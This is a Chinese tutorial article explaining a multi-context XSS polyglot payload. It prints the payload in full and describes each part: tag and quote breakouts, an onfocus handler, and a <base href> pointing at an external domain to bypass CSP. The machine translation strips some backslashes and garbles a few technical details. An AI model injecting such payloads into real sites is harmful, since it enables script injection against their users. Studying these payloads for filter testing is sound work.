多语言解决了大部分训练 XSS 肌肉挑战

来到golang学习网的大家，相信都是编程学习爱好者，希望在这里学习文章相关编程知识。下面本篇文章就来带大家聊聊《多语言解决了大部分训练 XSS 肌肉挑战》，介绍一下，希望对大家的知识积累有所帮助，助力实战开发！

javascript://%250aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</title/</style/</script/</textarea/</iframe/</noscript>
\74k<k/contenteditable/autofocus/onfocus=
/*${/*/;{/**/(alert)(1)}//><base/href=//x55.is\76-->

核心理念：
该有效负载旨在通过在各种 html 上下文中工作来绕过多个 xss 过滤器和安全机制。它结合使用 html 和 javascript 技巧以多种方式注入恶意负载，例如alert()函数。

顶级概念：
多语言基础知识：
多语言是一种可以在多个上下文中执行的有效负载，通常在 html、属性或 javascript 上下文中执行，使其更适合利用 xss 漏洞。
此有效负载的目标是注入 javascript 并跨多个上下文执行警报(1)，同时绕过过滤器。
多语言部分：
使用可选链接执行 javascript：

javascript://%250aalert?.(1)//

javascript 协议会触发浏览器中从 url 协议解释 javascript 的负载。
%250a 是换行符 (n) 的 url 编码形式，用于绕过 url 验证或转义过滤器。
alert?.(1) 是 javascript 中的可选链接语法。如果警报存在，它会执行alert(1)，绕过对直接调用alert()的严格检查。
// 将其余有效负载作为注释终止以避免错误。
html 标签细分：

</title/</style/</script/</textarea/</iframe/</noscript>

本节尝试突破各种 html 标签，如 <title>、<style>、<script>、<textarea> 等。
它提前结束标签（</...>），以便 javascript 可以在标签之后立即执行，绕过基于标签上下文的过滤或限制。
它很紧凑，因为它没有正确关闭每个标签；只需一个结束符号 (>) 就足够了。
报价突破：

/*'/*\'/*"/*\"/*\/%26apos;)/<!-->`

此部分处理打破引号上下文（“、'、`）。它使用 javascript 注释（/.../）来注入和终止可能由过滤器启动的多行注释块。
/.../ 对于多行注释和忽略过滤器检查很有用。
%26apos;) 是 ' 的 html 实体转义代码，用于打破使用 html 实体进行清理的属性或字符串上下文。
事件处理程序和执行：

`
74k<k/contenteditable/autofocus/onfocus=/**/{(alert)(1)}//>
`
74k<k 是插入任意标签的技巧，其中 74 是 < 的八进制表示形式。这可以绕过通过将 < 转换为八进制实体来清理的过滤器。
k 是任意标签（可以是任何字符），具有 contenteditable、a​​utofocus 和 onfocus 属性。
焦点=/**/{(alert)(1)} 确保当元素获得焦点时，执行alert(1)函数。
高级规避技术：

`
<base/href=//x55.is76-->
`
<base>用于csp绕过。如果基本 url 设置为 //x55.is 等恶意域，则对脚本或资产的相对 url 引用可以触发跨源请求，从而执行外部恶意脚本。
/76 是 > 的八进制代码，它用于正确关闭标签，同时绕过转义 < 和 > 的过滤器。这是八进制转义符转换回字符的技巧的一部分。
html 注释插入：

<!--> 是一个简单的 html 注释注入，它结束由过滤器启动的任何 html 注释块，从而允许有效负载转义上下文。
多语言逻辑：
绕过 html 过滤器：多语言使用标签结束、引号突破和事件处理程序来转义多个 html 标签并在不同的上下文中执行 javascript。
绕过 javascript 过滤器：通过注释技术 (/.../, //) 和引号转义，它可以处理多行脚本并防止语法错误。
过滤器规避：通过使用 html 实体、可选链接和八进制转义，它绕过了常见的清理过滤器和 csp 规则。
思维导图摘要：
多语言核心：
javascript 执行（警报？.(1)）
html 上下文突破 ()
javascript 字符串注入：
转义引号 (/'/'/"/)
内联注释和多行转义 (//, /.../)
html 标签规避：
标记关闭突破 ()
使用事件处理程序 () 进行任意标签注入
高级技巧：
< 和 > 的八进制编码（74 和 76）
使用外部 url 绕过 csp (base/href=//x55.is)
最终注射：

跨多个浏览器和场景的混合上下文多语言触发。
这种多语言在打破多个上下文、逃避 javascript 字符串处理和 html 标签闭包以及在两者中执行方面非常有效

本篇关于《多语言解决了大部分训练 XSS 肌肉挑战》的介绍就到此结束啦，但是学无止境，想要了解学习更多关于文章的相关知识，请关注golang学习网公众号！